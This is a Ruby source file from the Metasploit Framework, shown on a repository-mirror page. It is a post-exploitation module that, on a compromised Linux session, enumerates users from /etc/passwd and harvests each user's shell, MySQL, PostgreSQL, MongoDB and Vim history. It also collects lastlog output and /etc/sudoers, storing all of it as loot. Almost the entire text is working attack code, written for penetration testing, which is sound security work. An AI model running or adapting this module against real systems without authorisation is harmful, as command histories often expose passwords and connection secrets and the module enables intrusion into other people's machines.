Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/linux/gather/enum_users_history.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Post
7
include Msf::Post::File
8
include Msf::Post::Linux::System
9
10
def initialize(info = {})
11
super(
12
update_info(
13
info,
14
'Name' => 'Linux Gather User History',
15
'Description' => %q{
16
This module gathers the following user-specific information:
17
shell history, MySQL history, PostgreSQL history, MongoDB history,
18
Vim history, lastlog, and sudoers.
19
},
20
'License' => MSF_LICENSE,
21
'Author' => [
22
# based largely on get_bash_history function by Stephen Haywood
23
'ohdae <bindshell[at]live.com>'
24
],
25
'Platform' => ['linux'],
26
'SessionTypes' => ['shell', 'meterpreter'],
27
'Notes' => {
28
'Stability' => [CRASH_SAFE],
29
'SideEffects' => [],
30
'Reliability' => []
31
}
32
)
33
)
34
end
35
36
def run
37
distro = get_sysinfo
38
39
print_good('Info:')
40
print_good("\t#{distro[:version]}")
41
print_good("\t#{distro[:kernel]}")
42
43
user = execute('/usr/bin/whoami')
44
users = execute('/bin/cat /etc/passwd | cut -d : -f 1').chomp.split
45
users = [user] if user != 'root' || users.blank?
46
47
vprint_status("Retrieving history for #{users.length} users")
48
shells = %w[ash bash csh ksh sh tcsh zsh]
49
users.each do |u|
50
home = get_home_dir(u)
51
shells.each do |shell|
52
get_shell_history(u, home, shell)
53
end
54
get_mysql_history(u, home)
55
get_psql_history(u, home)
56
get_mongodb_history(u, home)
57
get_vim_history(u, home)
58
end
59
60
last = execute('/usr/bin/last && /usr/bin/lastlog')
61
sudoers = cat_file('/etc/sudoers')
62
save('Last logs', last) unless last.blank?
63
save('Sudoers', sudoers) unless sudoers.blank? || sudoers =~ /Permission denied/
64
end
65
66
def save(msg, data, ctype = 'text/plain')
67
ltype = 'linux.enum.users'
68
loot = store_loot(ltype, ctype, session, data, nil, msg)
69
print_good("#{msg} stored in #{loot}")
70
end
71
72
def execute(cmd)
73
vprint_status("Execute: #{cmd}")
74
output = cmd_exec(cmd)
75
output
76
end
77
78
def cat_file(filename)
79
vprint_status("Download: #{filename}")
80
output = read_file(filename)
81
output
82
end
83
84
def get_home_dir(user)
85
home = execute("echo ~#{user}")
86
if home.empty?
87
if user == 'root'
88
home = '/root'
89
else
90
home = "/home/#{user}"
91
end
92
end
93
home
94
end
95
96
def get_shell_history(user, home, shell)
97
vprint_status("Extracting #{shell} history for #{user}")
98
hist = cat_file("#{home}/.#{shell}_history")
99
save("#{shell} history for #{user}", hist) unless hist.blank? || hist =~ /No such file or directory/
100
end
101
102
def get_mysql_history(user, home)
103
vprint_status("Extracting MySQL history for #{user}")
104
sql_hist = cat_file("#{home}/.mysql_history")
105
save("MySQL history for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
106
end
107
108
def get_psql_history(user, home)
109
vprint_status("Extracting PostgreSQL history for #{user}")
110
sql_hist = cat_file("#{home}/.psql_history")
111
save("PostgreSQL history for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
112
end
113
114
def get_mongodb_history(user, home)
115
vprint_status("Extracting MongoDB history for #{user}")
116
sql_hist = cat_file("#{home}/.dbshell")
117
save("MongoDB history for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
118
end
119
120
def get_vim_history(user, home)
121
vprint_status("Extracting Vim history for #{user}")
122
vim_hist = cat_file("#{home}/.viminfo")
123
save("Vim history for #{user}", vim_hist) unless vim_hist.blank? || vim_hist =~ /No such file or directory/
124
end
125
end
126
127